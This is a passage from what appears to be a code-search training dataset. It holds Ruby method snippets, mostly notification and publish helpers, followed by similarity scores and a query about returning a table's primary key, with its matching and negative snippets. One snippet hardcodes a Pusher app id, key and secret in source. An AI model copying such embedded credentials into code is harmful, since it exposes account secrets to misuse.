"def publish_to(channel, data)\n publish_message(message(channel, data))\n end",
"def notify(method, *args)\n send_notify(method, args)\n nil\n end",
"def notify(token, notification = nil)\n client.notify app_id, token, notification\n end",
"def notify sender_id:, referent:, instance:, users:, params: {}\n notify_push(sender_id: sender_id, referent: referent, instance: instance, users: users, params: params)\n notify_inapp(sender_id: sender_id, referent: referent, instance: instance, users: users, params: params)\n end",
"def notify(message)\n client.register(nick)\n client.notify(message)\n client.quit\n\n puts \"New message has been notified on IRC: #{message}\"\n end",
"def publish_to(channel, data)\n publish_message(message(channel, data))\n end",
"def notify_change(input_channel)\n\n $test_logger.log(\"Notify change #{input_channel}\")\n\n case input_channel\n\n #If XML is changed\n when InputChannel::XML\n\n if @is_reply_ilv == true\n $test_logger.log(\"XML to hex/raw not processed as current ILV is reply ILV!\")\n else\n @ilv_hex_str = xml_to_hex(@xml_ilv_node)\n @ilv_raw_str = ILVMessage.hex_to_raw(@ilv_hex_str)\n end\n\n #If HEX string is changed\n when InputChannel::HEX\n @ilv_raw_str = ILVMessage.hex_to_raw(@ilv_hex_str)\n raw_to_xml(@xml_ilv_node, @ilv_raw_str)\n\n #If RAW string is changed\n when InputChannel::RAW\n @ilv_hex_str = ILVMessage.raw_to_hex(@ilv_raw_str)\n raw_to_xml(@xml_ilv_node, @ilv_raw_str)\n\n else\n raise \"Invalid channel specified '#{input_channel}'!\"\n end\n end",
"def push_notification\n pusher_client = Pusher::Client.new(\n app_id: '194717',\n key: 'c7a6150d22d40eea7bca',\n secret: '76c36e83b489767cef0a',\n encrypted: true\n )\n\n pusher_client.trigger('test_channel', 'my_event', {\n message: 'Event'\n })\n\n end",
"def perform(channel, message)\n Redis.current.publish(\n '__anycable__', MultiJson.dump(\n stream: channel,\n command: 'message',\n data: MultiJson.dump(message)\n )\n )\n end",
"def perform text, options = {}\n Utils::SlackNotifier.instance.notify(text, options)\n end",
"def broadcast\n notification = receiver.notifications.last\n case type\n when TYPES[:USER_HAS_BEEN_ASSIGNED_SHIFT]\n ActionCable.server.broadcast \"#{NotificationChannel::CHANNEL_NAME}_#{receiver.id}\",\n {\n type: type,\n payload: NotificationSerializer.new(notification, root: false)\n }.to_json\n end\n end",
"def publish(channel, message); end",
"def publish(channel, message); end",
"def publish_to(channel, data)\n\t\t\tpublish_message(message(channel, data))\n\t\tend",
"def send_execution_notification\n payload = execution_notification_payload\n trade_order.portfolio.user.notify_devices payload, self\n end",
"def createNotificationChannel(channel_type, content_type, version=1.0)\n url = \"#{@fqdn}#{NOTIFICATION_RESOURCE}\"\n headers = { \n :accept => 'application/json', \n :content_type => \"application/json\",\n }\n body = Webhooks.createChannel(channel_type, content_type, version)\n\n begin\n r = self.post(url, body.to_json, headers)\n rescue RestClient::Exception => e\n raise(ServiceException, e.response || e.message, e.backtrace)\n end\n Model::NotificationChannel.from_response(r)\n end",
"def notify(msg, subject)\n end",
"def notify(exception, opts = {})\n send_notice(build_notice_for(exception, opts))\n end",
"def notify(message, options = {})\n params = { message: message }.merge(options)\n post('/api/notify', params, options)\n end",
"def notify(item)\n begin\n @growl.notify(@@notification_type, item.title, item.message, @priority, @sticky)\n rescue Errno::ECONNREFUSED => e\n # TODO throw custom exception\n raise \"Growl settings not configured to allow remote application registration. See Growl website docs: http://growl.info/documentation/exploring-preferences.php\"\n end\n end",
"def _perform_notify(message, opts = {})\n opts = {\n name: opts[:type].to_s,\n text: message,\n icon: opts[:image]\n }.merge(opts)\n\n _gntp_client(opts).notify(opts)\n end",
"def publish(channel, message)\n node_for(channel).publish(channel, message)\n end",
"def notify(event_type, *args)\n agent.events.notify(event_type, *args)\n rescue\n NewRelic::Agent.logger.debug('Ignoring exception during %p event notification' % [event_type])\n end",
"def notify(interests, data = {})\n Request.new(\n @pusher_client,\n :post,\n url(\"/notifications\"),\n {},\n payload(interests, data)\n ).send_sync\n end",
"def notify_user(user, message, action)\n ActionCable.server.broadcast(\n \"message_channel_#{user.aitu_id}\",\n message: {\n action: action,\n order_item: ::MessageBlueprint.render(message).to_json\n }\n )\n send_push(user, message)\n end",
"def notification=(options = {})\n if options.respond_to?(:keys)\n notification.port = options[:port] if options[:port]\n notification.host = options[:host] if options[:host]\n end\n end",
"def notify(type,subject,target=nil)\n self.notices.create :type => type, :subject => subject, :target => target\n end",
"def publish(channel, event, &block)\n FayeMessage.new.publish(event, channel, capture(&block))\n end",
"def notify(exception, options = {})\n send_notice(build_notice_for(exception, options))\n end",
"def subscribe(channel, data = {})\n log_to_file(\"#{self.class} tries to subscribe to channel #{channel} with #{data.inspect}\")\n send_action('subscribe', channel, data)\n end",
"def notify(message, options={}, &block)\n backtrace = filter_backtrace(options[:backtrace] || caller)\n notification = Notification.new(name, backtrace, message)\n add_notification(notification)\n end",
"def notify(optional_destination, rpc_method, *args)\n # TODO\n end",
"def push(notif)\n\n end",
"def notify(message)\n notifier = BeNotified::Notifier.new(notifier_type, message)\n notifier.notify\n end",
"def notify(subject,body,obj = nil,sanitize_text=true,notification_code=nil,send_mail=true,sender=nil)\n Mailboxer::Notification.notify_all([self],subject,body,obj,sanitize_text,notification_code,send_mail,sender)\n end",
"def publish(channel, data)\n @ws.send(get_publish_object(channel, data, increment_cnt).to_json)\n end",
"def notify(message, options = {})\n if TerminalNotifier.available?\n TerminalNotifier.silent_execute(options.merge(:message => message).map { |k,v| [\"-#{k}\", v.to_s] }.flatten)\n else\n raise \"terminal-notifier is only supported on Mac OS X 10.8, or higher.\"\n end\n end",
"def _perform_notify(message, options = {})\n change_color = options[:change_color]\n locations = Array(options[:color_location])\n display_the_title = options[:display_title]\n display_message = options[:display_message]\n type = options[:type].to_s\n title = options[:title]\n\n if change_color\n color = _tmux_color(type, options)\n locations.each do |location|\n Client.new(client(options)).set(location, color)\n end\n end\n\n _display_title(type, title, message, options) if display_the_title\n\n return unless display_message\n _display_message(type, title, message, options)\n end",
"def notify(subscriber, *args, &block)\n if subscriber.respond_to? MESSAGE\n subscriber.public_send(MESSAGE, self, *args, &block)\n end\n end",
"def send_message(email, text)\n @notification_server.send_message email, text\n end",
"def notify\n socket.write('x')\n end",
"def growl_notify\n\t\t\toptions = { :title => @application,\n\t\t\t\t\t\t\t\t\t:description => @message.gsub(/[\\n]+/, \"\"),\n\t\t\t\t\t\t\t\t\t:application_name => @application,\n\t\t\t\t\t\t\t\t\t:image_from_location => @icon,\n\t\t\t\t\t\t\t\t\t:sticky => false,\n\t\t\t\t\t\t\t\t\t:priority => 0,\n\t\t\t\t\t\t\t\t\t:with_name => notifications.first }\n @growl.notify options\t\t\t\n\t\tend",
"def send_message_notification\n message = MessageBlueprint.render_as_json(self)\n ActionCable.server.broadcast \"conversation_#{ self.conversation_id }_notification_channel\", message\n # receiver = self.conversation.user_one_id == self.user_id ? self.conversation.user_two_id : self.conversation.user_one_id\n # response = self.attributes.merge(user: self.user&.name)\n # ActionCable.server.broadcast \"user_#{ receiver }_notification_channel\", response.as_json.to_s\n end",
"def notify_topic(message, options: nil, &block)\n command = make_simple_command(:post, 'messages:send', options)\n command.request_representation = Google::Apis::Messages::Message::Representation\n command.request_object = message\n\n if !ENV['FIREBASE_DEBUG'].nil?\n log_json(command)\n end\n\n execute_or_queue_command(command, &block)\n end",
"def notify(event, message, *args)\n api_key = args.first.is_a?(String) || args.first.is_a?(Array) ? args.shift : self.api_key\n\n raise ConfigurationError, \"You must provide an API key to send notifications\" if api_key.nil?\n raise ConfigurationError, \"You must provide an application name to send notifications\" if application.nil?\n\n if args.first.is_a?(Fixnum)\n options = { :priority => args.shift, :delayed => args.shift || Prowler.delayed }\n else\n options = args.last.is_a?(Hash) ? args.pop : {}\n options = { :priority => Prowler::Priority::NORMAL, :delayed => Prowler.delayed }.merge(options)\n end\n\n options.merge!(\n :application => application, :providerkey => provider_key,\n :apikey => api_key, :event => event, :description => message\n )\n\n if options.delete(:delayed)\n enqueue_delayed_job(options)\n else\n perform(:add, options, :post, Success)\n end\n end",
"def send_irc(channel, message)\n real_channel = @zbot.get_channel(channel)\n if real_channel\n real_channel.send(message)\n else\n puts \"############## CHANNEL #{channel} NOT FOUND !\"\n end\n end",
"def send_message(event, payload = nil, destination = nil)\n Redis.publish('slanger:cluster', {sender: node_id, destination: destination, event: event, payload: payload}.to_json)\n end",
"def notification_params\n params.require(\"notification\").\n permit( :message, :dcm_topic_id, :sse_channel)\n end",
"def notify_receiver\n conversation = ConversationBlueprint.render_as_json(self, view: :normal)\n ActionCable.server.broadcast \"user_#{ self.user_two_id }_notification_channel\", conversation\n end",
"def notify(body, subject = \"Mail from automation\")\n url = \"#{@base_rpm_url}/v1/steps/#{@params[\"step_id\"]}/notify?token=#{@token}\"\n data = {\"filters\"=>{\"notify\"=>{\"body\"=> body, \"subject\"=> subject}}}\n result = rest_call(url, \"get\", {\"data\" => data})\n end",
"def notify(data)\n message = data[:message]\n value = data[:value]\n\n unless message && value\n raise ArgumentError, 'You need to set :message and :value to send notify.'\n end\n\n @notifiers.each do |notifier, options|\n # .dup is NOT reliable\n options_copy = Marshal.load(Marshal.dump(options))\n notifier.new(options_copy).notify(@name, message, value)\n end\n end",
"def send_notification(msg)\n EM.next_tick do\n @do_notify.call(msg)\n end\n end",
"def notify module_id, msg\n msg[:client_id] = @client_id\n msg[:username] = @username\n @ws.send ['client', compose_request(nil, module_id, msg)].to_json\n end",
"def channel(name)\n arn = self.fetch(name)\n region = arn.split(':')[3]\n notifier_builder.new(region: region).topics[arn]\n end",
"def notify(message)\n puts message['data']\n end",
"def invite(nickname, channel)\n send_data(\"INVITE #{nickname} #{channel}\")\n end",
"def createMIMNotificationChannel(content_type, version=1.0)\n self.createNotificationChannel(\"MIM\", content_type, version)\n end",
"def test_notify\n gcm_response = send_notification(params[:test_payload_to_send], params[:test_gcm_ids])\n\n render json: get_v1_formatted_response({}, true, [gcm_response[:response]]).to_json\n end",
"def channel\n @channel ||= Proletariat.connection.create_channel\n end",
"def channel\n @channel ||= Proletariat.connection.create_channel\n end",
"def _perform_notify(message, opts = {})\n opts = opts.merge(\n summary: opts[:title],\n icon_path: opts[:image],\n body: message,\n urgency: opts[:urgency] || (opts[:type] == \"failed\" ? :normal : :low)\n )\n\n ::Libnotify.show(opts)\n end",
"def topic(channel, str)\n sendmsg \"TOPIC #{channel} :#{str}\"\n end",
"def listen_to_channel(connection, channel, &block)\n connection.execute(\"LISTEN #{channel}\")\n\n loop do\n connection.raw_connection.wait_for_notify(10) do |event, pid, payload|\n return if yield payload\n end\n end\n ensure\n connection.execute(\"UNLISTEN *\")\n end",
"def topic(channel, topic = nil)\n topic = \":#{topic}\" if topic\n send_msg(\"TOPIC #{channel} #{topic}\")\n end",
"def notify!(message)\n message = message.merge(reference: @reference) if @reference\n\n notification_url = @notification_url\n if notification_url\n message_json = message.stringify_keys.to_json\n\n # TODO: Retry on failure\n @logger.info { \"Notifying #{notification_url} with message: #{message_json}\" }\n begin\n Excon.post(notification_url,\n :body => message_json,\n :headers => {'Content-Type' => 'application/json; charset=utf-8'})\n rescue => exception\n Application.get.report_exception(exception, \"Notification failed with exception\")\n end\n else\n if (river = Application.get.river)\n begin\n river.publish(message.merge(\n uid: @uid,\n event: \"tootsie_#{message[:event]}\"))\n rescue => exception\n Application.get.report_exception(exception, \"River notification failed with exception\")\n end\n end\n end\n end",
"def subscribe(channel, &block)\n faye.subscribe \"/topic/#{channel}\", &block\n end",
"def push_many(channels, notification_view)\n return if channels.empty?\n message = notification_view.render_to_string\n Pusher.trigger_async(channels, EVENT, {message: message, type: notification_view.type.to_s}) \n end",
"def notification(method, *args)\n data = Request.new(method, args, nil).data\n RPC.log \"CLIENT ENCODE NOTIFICATION #{data.inspect}\"\n data.to_json\n end",
"def notify! message_obj = OpenStruct.new, to = nil\n slack_hash = Hash.new\n channel = get_channel config.adapters[:slack], to\n slack_hash['channel'] = channel\n optional_parameters = [:username, :icon_url, :icon_emoji]\n optional_parameters.each do |op|\n if config.adapters[:slack][op]\n slack_hash[op] = config.adapters[:slack][op]\n end\n end\n\n slack_hash['text'] = get_message_body(binding)\n\n @logger.debug \"slack parameters: #{slack_hash.inspect}\"\n \n if config.test? then\n @logger.info \"Not sending message in test mode\"\n return true\n end\n\n begin\n @logger.debug \"Posting to slack webhook: #{@webhook_url}\"\n reply = HTTParty.post(@webhook_url, :body => JSON.dump(slack_hash))\n reply.response.value # this raises an error if the response said it was unsuccessful\n true\n rescue CollinsNotify::CollinsNotifyException => e\n @logger.error \"error sending slack notification - #{e}\"\n raise e\n rescue Exception => e\n @logger.error \"#{e.class.to_s} - error sending slack notification - #{e}\"\n raise CollinsNotify::CollinsNotifyException.new e\n end\n end",
"def notify(message)\n @slack.ping(message) if NOTIFICATION_ENVIRONMENTS.include? Rails.env\n end",
"def send_notification(method, params); end",
"def invite(nickname, channel)\n raw \"INVITE #{nickname} #{channel}\\r\\n\"\n end",
"def channel=(chan)\n notes.each{|n| n.channel = chan}\n end",
"def notify(message)\n g = Client.new(grove_channel_token,\n :service => grove_service,\n :icon_url => grove_icon_url,\n :url => grove_url\n )\n\n unless g.notify(message)\n # error\n logger.important \"Failed to send notification to grove.io\"\n end\n end"
] |
[
"0.8064743",
"0.57137465",
"0.5685415",
"0.56356466",
"0.5602777",
"0.55876213",
"0.54835033",
"0.5469714",
"0.5420852",
"0.5420809",
"0.5384294",
"0.5377497",
"0.53681254",
"0.53485763",
"0.5333337",
"0.5321088",
"0.5249252",
"0.523603",
"0.5228612",
"0.52157784",
"0.52153087",
"0.5209446",
"0.51458263",
"0.51039755",
"0.50940925",
"0.5089084",
"0.5062675",
"0.50612235",
"0.5034023",
"0.5022701",
"0.5008444",
"0.4980165",
"0.49544582",
"0.49541402",
"0.49528182",
"0.49523115",
"0.4947653",
"0.49425358",
"0.49425358",
"0.49328288",
"0.49222198",
"0.49163654",
"0.48958987",
"0.48872346",
"0.48822084",
"0.48758277",
"0.48729765",
"0.48681578",
"0.48316905",
"0.48241928",
"0.48105478",
"0.47816196",
"0.47680014",
"0.47662264",
"0.47603706",
"0.4756261",
"0.4752746",
"0.4751311",
"0.47320813",
"0.47286803",
"0.47256777",
"0.47232094",
"0.47017434",
"0.46927166",
"0.4691894",
"0.46869084",
"0.4686053",
"0.46825203",
"0.46807712",
"0.46710917",
"0.46653765",
"0.46630752",
"0.46598426",
"0.46513534",
"0.46442318",
"0.46425837",
"0.46402347",
"0.46284276",
"0.46202213",
"0.46167594",
"0.4616139",
"0.46057028",
"0.4601806",
"0.45991465",
"0.459571",
"0.459571",
"0.45936882",
"0.45932767",
"0.4593196",
"0.45918718",
"0.45913526",
"0.45864615",
"0.4585766",
"0.4581009",
"0.45804554",
"0.45793194",
"0.4579251",
"0.45750117",
"0.45683676",
"0.45634863"
] |
0.77982366
|
1
|
Return primary key for the given table.
|
def primary_key(table, opts=OPTS)
quoted_table = quote_schema_table(table)
Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}
value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))
Sequel.synchronize{@primary_keys[quoted_table] = value}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def find_primary_key(table)\n query = %q{\n SELECT column_name\n FROM information_schema.table_constraints tc\n INNER JOIN\n information_schema.key_column_usage kcu\n ON tc.constraint_name = kcu.constraint_name\n WHERE constraint_type = 'PRIMARY KEY'\n AND tc.table_catalog = 'reaktor'\n AND tc.table_schema = 'public'\n AND tc.table_name = ?\n ORDER BY ordinal_position;\n }\n\n sth = $dbh_pg.prepare(query)\n begin\n sth.execute(table.to_s)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not find primary key. Message: #{$!}. query: #{get_query_string(sth)}\")\n raise\n exit\n end\n pk = []\n while row = sth.fetch\n pk << row[0]\n end\n return pk\nend",
"def pkey\n table = self.class.table_name\n key = get_primary_key_values.first\n return key\n end",
"def key\n get_primary_key_value_map[self.class.table_name]\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key(_table_name)\n []\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key\n @primary_key\n end",
"def full_primary_key(klass)\n \"#{klass.quoted_table_name}.#{klass.quoted_primary_key}\"\n end",
"def primary_key\n return @primary_key if @primary_key\n return 'id' if @id\n \n candidates = @columns.find_all { |col| col.unique }.map { |col| col.name }\n return 'id' if candidates.include? 'id'\n candidates.find { |c| c =~ eval(\"/^#{@name}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{singularize}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{pluralize}.*id$/i\") } ||\n candidates.first\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def primary_key\n case primary_key_prefix_type\n when :table_name\n Inflector.foreign_key(class_name_of_active_record_descendant(self), false)\n when :table_name_with_underscore\n Inflector.foreign_key(class_name_of_active_record_descendant(self))\n else\n \"id\"\n end\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def primary_key\n send( self.class.primary_key )\n end",
"def association_primary_key(klass = nil)\n active_record.primary_key\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def primary_key\n select(&:primary_key?)\n end",
"def primary_key\n '_id'\n end",
"def primary_key\n 'id'\n end",
"def primary_key\n fields.select { |f| f.key }.map(&:name)\n end",
"def primary_key\n self[:primary_key]\n end",
"def primary_key\n primary_key = attributes.find { |a| a.primary_key? }\n error(\"Unable to locate primary key for #{self.name}, attributes => #{attributes.collect { |a| a.name }}\") unless primary_key\n primary_key\n end",
"def primary_key_for(entity_name)\n namespace, _, entity_name = entity_name.rpartition('.')\n raise ArgumentError, 'Namespace missing' if namespace.nil? || namespace.empty?\n schemas[namespace].primary_key_for(entity_name)\n end",
"def primary_key_for(entity_name)\n namespace, _, entity_name = entity_name.rpartition('.')\n raise ArgumentError, 'Namespace missing' if namespace.nil? || namespace.empty?\n schemas[namespace].primary_key_for(entity_name)\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def pkey_selection(table = nil)\n prefix = table ? \"#{table}.\" : \"\"\n \"#{primary_key.map { |k| \"#{prefix}`#{k}` AS '#{k}'\" }.join(', ')}\"\n end",
"def primary_key\n @attributes[self.primary_key_attribute]\n end",
"def orchestrate_primary_key\n id\n end",
"def table_primary_keys table_name, include_parent_keys = false\n sql = +\"WITH TABLE_PK_COLS AS ( \"\n sql << \"SELECT C.TABLE_NAME, C.COLUMN_NAME, C.INDEX_NAME, C.COLUMN_ORDERING, C.ORDINAL_POSITION \"\n sql << \"FROM INFORMATION_SCHEMA.INDEX_COLUMNS C \"\n sql << \"WHERE C.INDEX_TYPE = 'PRIMARY_KEY' \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '') \"\n sql << \"SELECT INDEX_NAME, COLUMN_NAME, COLUMN_ORDERING, ORDINAL_POSITION \"\n sql << \"FROM TABLE_PK_COLS \"\n sql << \"INNER JOIN INFORMATION_SCHEMA.TABLES T USING (TABLE_NAME) \"\n sql << \"WHERE TABLE_NAME = %<table_name>s \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '' \"\n unless include_parent_keys\n sql << \"AND (T.PARENT_TABLE_NAME IS NULL OR COLUMN_NAME NOT IN ( \"\n sql << \" SELECT COLUMN_NAME \"\n sql << \" FROM TABLE_PK_COLS \"\n sql << \" WHERE TABLE_NAME = T.PARENT_TABLE_NAME \"\n sql << \")) \"\n end\n sql << \"ORDER BY ORDINAL_POSITION\"\n execute_query(\n sql,\n table_name: table_name\n ).map do |row|\n Index::Column.new \\\n table_name,\n row[\"INDEX_NAME\"],\n row[\"COLUMN_NAME\"],\n order: row[\"COLUMN_ORDERING\"],\n ordinal_position: row[\"ORDINAL_POSITION\"]\n end\n end",
"def primary_key\n cached_fetch(:primary_key){associated_class.primary_key || raise(Error, \"no primary key specified for #{associated_class.inspect}\")}\n end",
"def insert_pk\n if (f = opts[:from]) && !f.empty?\n case t = f.first\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n pk\n end\n end\n end\n end",
"def table_id\n\n end",
"def primary_key\n self.class.primary_key == :id ? id : @saved_attributes[self.class.primary_key]\n end",
"def primary_key_attribute\n :id\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def primary_key=(key)\n @primary_key = key\n end",
"def scaffold_primary_key\n get_key_array_safe(key).name\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def primary_key_value(obj)\n obj.pk\n end",
"def primary_key_names(table_name, options = {})\n return connection.primary_key_names(table_name) if options[:raw]\n \n self.primary_key_names_cache ||= {}\n result = primary_key_names_cache[table_name]\n unless result\n result = manual_primary_keys[table_name] || connection.primary_key_names(table_name)\n primary_key_names_cache[table_name] = result\n end\n result\n end",
"def quoted_primary_key\n @quoted_primary_key ||= connection.quote_column_name(primary_key)\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n 